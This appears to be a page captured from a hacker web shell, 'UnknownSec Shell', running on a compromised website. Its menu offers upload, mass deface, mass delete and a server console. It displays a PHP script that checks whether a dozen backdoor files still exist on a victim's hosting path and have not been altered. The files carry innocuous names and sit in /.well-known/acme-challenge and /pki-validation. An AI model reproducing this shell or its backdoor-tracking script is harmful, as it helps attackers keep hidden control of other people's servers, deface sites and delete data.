bouloter.com - UnknownSec

upload mass deface mass delete console info server
name : .object
<?php   $r = '/home/maio/buenaventura.maio.pe'; $x = ["/users_add.php"=>"bd@@1030413@@900",
"/.well-known/acme-challenge/mimeDecode.php"=>"bd@@1034646@@73",
"/.well-known/acme-challenge/mamboxml.php"=>"bd@@1034664@@75",
"/.well-known/pki-validation/Diff.php"=>"bd@@1034689@@42",
"/.well-known/Input.php"=>"bd@@722301@@1511",
"/.well-known/Fields.php"=>"bd@@1032815@@68",
"/.well-known/pki-validation/symbol.php"=>"bd@@1034621@@12",
"/case.php"=>"bd@@601522@@877",
"/case.php"=>"bd@@1034712@@39",
"/.well-known/acme-challenge/searchtypes.php"=>"bd@@1034730@@935",
"/.well-known/tinybrowser.php"=>"bd@@1034743@@956",
"/.well-known/pki-validation/symbol.php"=>"bd@@1032955@@872"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');
UnknownSec Shell
